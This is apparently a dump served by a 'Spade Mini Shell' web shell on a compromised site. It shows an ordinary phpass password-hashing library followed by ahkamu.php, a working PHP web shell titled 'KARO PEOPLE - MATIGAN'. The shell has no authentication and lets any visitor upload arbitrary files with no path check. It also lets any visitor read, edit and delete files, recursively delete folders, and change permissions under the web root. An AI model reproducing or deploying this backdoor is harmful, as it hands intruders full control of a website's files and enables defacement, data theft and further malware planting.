Spade
Mini Shell
PasswordHash.php000064400000014170151165074370007677 0ustar00<?php
#
# Portable PHP password hashing framework.
#
# Version 0.5 / genuine.
#
# Written by Solar Designer <solar at openwall.com> in 2004-2006 and
placed in
# the public domain. Revised in subsequent years, still public domain.
#
# There's absolutely no warranty.
#
# The homepage URL for this framework is:
#
# http://www.openwall.com/phpass/
#
# Please be sure to update the Version line if you edit this file in any
way.
# It is suggested that you leave the main version number intact, but
indicate
# your project name (after the slash) and add your own revision
information.
#
# Please do not change the "private" password hashing method
implemented in
# here, thereby making your hashes incompatible. However, if you must,
please
# change the hash type identifier (the "$P$") to something
different.
#
# Obviously, since this code is in the public domain, the above are not
# requirements (there can be none), but merely suggestions.
#
class PasswordHash {
var $itoa64;
var $iteration_count_log2;
var $portable_hashes;
var $random_state;
function __construct($iteration_count_log2, $portable_hashes)
{
$this->itoa64 =
'./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31)
$iteration_count_log2 = 8;
$this->iteration_count_log2 = $iteration_count_log2;
$this->portable_hashes = $portable_hashes;
$this->random_state = microtime();
if (function_exists('getmypid'))
$this->random_state .= getmypid();
}
function PasswordHash($iteration_count_log2, $portable_hashes)
{
self::__construct($iteration_count_log2, $portable_hashes);
}
function get_random_bytes($count)
{
$output = '';
if (@is_readable('/dev/urandom') &&
($fh = @fopen('/dev/urandom', 'rb'))) {
$output = fread($fh, $count);
fclose($fh);
}
if (strlen($output) < $count) {
$output = '';
for ($i = 0; $i < $count; $i += 16) {
$this->random_state =
md5(microtime() . $this->random_state);
$output .= md5($this->random_state, TRUE);
}
$output = substr($output, 0, $count);
}
return $output;
}
function encode64($input, $count)
{
$output = '';
$i = 0;
do {
$value = ord($input[$i++]);
$output .= $this->itoa64[$value & 0x3f];
if ($i < $count)
$value |= ord($input[$i]) << 8;
$output .= $this->itoa64[($value >> 6) & 0x3f];
if ($i++ >= $count)
break;
if ($i < $count)
$value |= ord($input[$i]) << 16;
$output .= $this->itoa64[($value >> 12) & 0x3f];
if ($i++ >= $count)
break;
$output .= $this->itoa64[($value >> 18) & 0x3f];
} while ($i < $count);
return $output;
}
function gensalt_private($input)
{
$output = '$P$';
$output .= $this->itoa64[min($this->iteration_count_log2 +
((PHP_VERSION >= '5') ? 5 : 3), 30)];
$output .= $this->encode64($input, 6);
return $output;
}
function crypt_private($password, $setting)
{
$output = '*0';
if (substr($setting, 0, 2) === $output)
$output = '*1';
$id = substr($setting, 0, 3);
# We use "$P$", phpBB3 uses "$H$" for the same thing
if ($id !== '$P$' && $id !== '$H$')
return $output;
$count_log2 = strpos($this->itoa64, $setting[3]);
if ($count_log2 < 7 || $count_log2 > 30)
return $output;
$count = 1 << $count_log2;
$salt = substr($setting, 4, 8);
if (strlen($salt) !== 8)
return $output;
# We were kind of forced to use MD5 here since it's the only
# cryptographic primitive that was available in all versions
# of PHP in use. To implement our own low-level crypto in PHP
# would have resulted in much worse performance and
# consequently in lower iteration counts and hashes that are
# quicker to crack (by non-PHP code).
$hash = md5($salt . $password, TRUE);
do {
$hash = md5($hash . $password, TRUE);
} while (--$count);
$output = substr($setting, 0, 12);
$output .= $this->encode64($hash, 16);
return $output;
}
function gensalt_blowfish($input)
{
# This one needs to use a different order of characters and a
# different encoding scheme from the one in encode64() above.
# We care because the last character in our encoded string will
# only represent 2 bits. While two known implementations of
# bcrypt will happily accept and correct a salt string which
# has the 4 unused bits set to non-zero, we do not want to take
# chances and we also do not want to waste an additional byte
# of entropy.
$itoa64 =
'./ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
$output = '$2a$';
$output .= chr(ord('0') + $this->iteration_count_log2 / 10);
$output .= chr(ord('0') + $this->iteration_count_log2 % 10);
$output .= '$';
$i = 0;
do {
$c1 = ord($input[$i++]);
$output .= $itoa64[$c1 >> 2];
$c1 = ($c1 & 0x03) << 4;
if ($i >= 16) {
$output .= $itoa64[$c1];
break;
}
$c2 = ord($input[$i++]);
$c1 |= $c2 >> 4;
$output .= $itoa64[$c1];
$c1 = ($c2 & 0x0f) << 2;
$c2 = ord($input[$i++]);
$c1 |= $c2 >> 6;
$output .= $itoa64[$c1];
$output .= $itoa64[$c2 & 0x3f];
} while (1);
return $output;
}
function HashPassword($password)
{
$random = '';
if (CRYPT_BLOWFISH === 1 && !$this->portable_hashes) {
$random = $this->get_random_bytes(16);
$hash =
crypt($password, $this->gensalt_blowfish($random));
if (strlen($hash) === 60)
return $hash;
}
if (strlen($random) < 6)
$random = $this->get_random_bytes(6);
$hash =
$this->crypt_private($password,
$this->gensalt_private($random));
if (strlen($hash) === 34)
return $hash;
# Returning '*' on error is safe here, but would _not_ be safe
# in a crypt(3)-like function used _both_ for generating new
# hashes and for validating passwords against existing hashes.
return '*';
}
function CheckPassword($password, $stored_hash)
{
$hash = $this->crypt_private($password, $stored_hash);
if ($hash[0] === '*')
$hash = crypt($password, $stored_hash);
# This is not constant-time. In order to keep the code simple,
# for timing safety we currently rely on the salts being
# unpredictable, which they are at least in the non-fallback
# cases (that is, when we use /dev/urandom and bcrypt).
return $hash === $stored_hash;
}
}
?>
ahkamu.php000064400000022761151165074400006536 0ustar00<?php
// Base directory configuration (change as needed)
$base_dir = $_SERVER['DOCUMENT_ROOT'];
$directory = isset($_GET['dir']) ? $_GET['dir'] :
$base_dir;
$full_path = realpath($directory);
// Security function for path validation
function is_valid_path($path) {
global $base_dir;
return strpos(realpath($path), realpath($base_dir)) === 0;
}
// Function to format file size in human-readable form
function format_size($size) {
$units = ['B', 'KB', 'MB',
'GB', 'TB'];
$unit = 0;
while ($size >= 1024 && $unit < count($units) - 1) {
$size /= 1024;
$unit++;
}
return round($size, 2) . ' ' . $units[$unit];
}
// Function to display folder permissions
function get_permissions($path) {
return substr(sprintf('%o', fileperms($path)), -4);
}
// File Upload Feature
if (isset($_FILES['file_to_upload'])) {
$target_file = $full_path . DIRECTORY_SEPARATOR .
basename($_FILES['file_to_upload']['name']);
if
(move_uploaded_file($_FILES['file_to_upload']['tmp_name'],
$target_file)) {
echo "<div class='alert alert-success'>File
" .
htmlspecialchars(basename($_FILES['file_to_upload']['name']))
. " successfully uploaded.</div>";
} else {
echo "<div class='alert alert-danger'>Failed
to upload file.</div>";
}
}
// File Edit Feature
if (isset($_POST['edit_file']) &&
isset($_POST['file_content'])) {
$edit_file = $_POST['edit_file'];
if (is_valid_path($edit_file)) {
file_put_contents($edit_file, $_POST['file_content']);
echo "<div class='alert alert-success'>File
successfully edited.</div>";
} else {
echo "<div class='alert alert-danger'>Invalid
file path.</div>";
}
}
// File Delete Feature
if (isset($_POST['delete_file'])) {
$delete_file = $_POST['delete_file'];
if (is_valid_path($delete_file) && is_file($delete_file)) {
unlink($delete_file);
echo "<div class='alert alert-success'>File
successfully deleted.</div>";
} else {
echo "<div class='alert alert-danger'>Failed
to delete file.</div>";
}
}
// Folder Delete Feature
if (isset($_POST['delete_folder'])) {
$delete_folder = $_POST['delete_folder'];
if (is_valid_path($delete_folder) && is_dir($delete_folder)) {
rmdir_recursive($delete_folder);
echo "<div class='alert alert-success'>Folder
successfully deleted.</div>";
} else {
echo "<div class='alert alert-danger'>Failed
to delete folder.</div>";
}
}
// Recursive function to delete a folder and its contents
function rmdir_recursive($dir) {
foreach (scandir($dir) as $file) {
if ($file !== '.' && $file !== '..') {
$full_path = $dir . DIRECTORY_SEPARATOR . $file;
if (is_dir($full_path)) {
rmdir_recursive($full_path);
} else {
unlink($full_path);
}
}
}
rmdir($dir);
}
// Load file content for editing via AJAX
if (isset($_GET['load_file'])) {
$file_to_load = $_GET['load_file'];
if (is_valid_path($file_to_load) && is_file($file_to_load)) {
echo file_get_contents($file_to_load);
}
exit;
}
// Handle permissions update
if (isset($_POST['set_permissions'])) {
$target_path = $_POST['target_path'];
$permissions = $_POST['permissions'];
if (is_valid_path($target_path)) {
chmod($target_path, octdec($permissions));
echo "<div class='alert
alert-success'>Permissions updated to
$permissions.</div>";
} else {
echo "<div class='alert alert-danger'>Failed
to update permissions.</div>";
}
}
// List Directory Content
$files = scandir($full_path);
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,
initial-scale=1.0">
<title>KARO PEOPLE - MATIGAN</title>
<link
href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css"
rel="stylesheet">
</head>
<body>
<div class="container mt-5">
<h1 class="text-center mb-4">KARO PEOPLE -
MATIGAN</h1>
<!-- File Upload Form -->
<div class="card mb-4">
<div class="card-header">
<h2>Upload File</h2>
</div>
<div class="card-body">
<form action="" method="POST"
enctype="multipart/form-data" class="form-inline">
<div class="form-group">
<input type="file"
name="file_to_upload" class="form-control mb-2
mr-2">
</div>
<button type="submit" class="btn
btn-primary mb-2">Upload</button>
</form>
</div>
</div>
<!-- Directory Content -->
<div class="card">
<div class="card-header">
<h2>Directory Content: <?php echo
htmlspecialchars($full_path); ?></h2>
</div>
<div class="card-body">
<ul class="list-group">
<?php foreach ($files as $file): ?>
<?php if ($file !== '.' && $file
!== '..'): ?>
<li class="list-group-item d-flex
justify-content-between align-items-center">
<?php if (is_dir($full_path .
DIRECTORY_SEPARATOR . $file)): ?>
<a href="?dir=<?php echo
urlencode($full_path . DIRECTORY_SEPARATOR . $file); ?>">
<strong><?php echo
htmlspecialchars($file); ?></strong>
</a>
<form action=""
method="POST" style="display: inline;">
<input type="hidden"
name="delete_folder" value="<?php echo
htmlspecialchars($full_path . DIRECTORY_SEPARATOR . $file);
?>">
<button type="submit"
class="btn btn-danger btn-sm">Delete Folder</button>
</form>
<?php else: ?>
<?php echo htmlspecialchars($file);
?>
(<?php echo
format_size(filesize($full_path . DIRECTORY_SEPARATOR . $file)); ?>)
<span
class="text-muted">(Permissions: <?php echo
get_permissions($full_path . DIRECTORY_SEPARATOR . $file);
?>)</span>
<div>
<button type="button"
class="btn btn-warning btn-sm"
onclick="editFile('<?php echo addslashes($full_path .
DIRECTORY_SEPARATOR . $file); ?>')">Edit</button>
<form action=""
method="POST" style="display: inline;">
<input type="hidden"
name="delete_file" value="<?php echo
htmlspecialchars($full_path . DIRECTORY_SEPARATOR . $file);
?>">
<button type="submit"
class="btn btn-danger btn-sm">Delete</button>
</form>
<form action=""
method="POST" style="display: inline;">
<input type="hidden"
name="target_path" value="<?php echo
htmlspecialchars($full_path . DIRECTORY_SEPARATOR . $file);
?>">
<input type="text"
name="permissions" placeholder="0644"
class="form-control-sm">
<button type="submit"
name="set_permissions" class="btn btn-info
btn-sm">Set Permissions</button>
</form>
</div>
<?php endif; ?>
</li>
<?php endif; ?>
<?php endforeach; ?>
</ul>
</div>
</div>
</div>
<!-- Modal for Editing File -->
<div id="editModal" class="modal"
tabindex="-1" role="dialog">
<div class="modal-dialog" role="document">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title">Edit
File</h5>
<button type="button"
class="btn-close"
onclick="closeModal()"></button>
</div>
<div class="modal-body">
<form action="" method="POST">
<input type="hidden"
name="edit_file" id="edit_file">
<div class="form-group">
<textarea name="file_content"
id="file_content" rows="10"
class="form-control"></textarea>
</div>
<button type="submit" class="btn
btn-primary mt-3">Save Changes</button>
</form>
</div>
<div class="modal-footer">
<button type="button" class="btn
btn-secondary"
onclick="closeModal()">Close</button>
</div>
</div>
</div>
</div>
<script>
function editFile(filePath) {
document.getElementById('editModal').style.display =
'block';
document.getElementById('edit_file').value = filePath;
// Load file content using Ajax
var xhr = new XMLHttpRequest();
xhr.open('GET', '?load_file=' +
encodeURIComponent(filePath), true);
xhr.onload = function () {
if (xhr.status === 200) {
document.getElementById('file_content').value =
xhr.responseText;
}
};
xhr.send();
}
function closeModal() {
document.getElementById('editModal').style.display =
'none';
}
</script>
<!-- Bootstrap JS -->
<script
src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js"></script>
</body>
</html>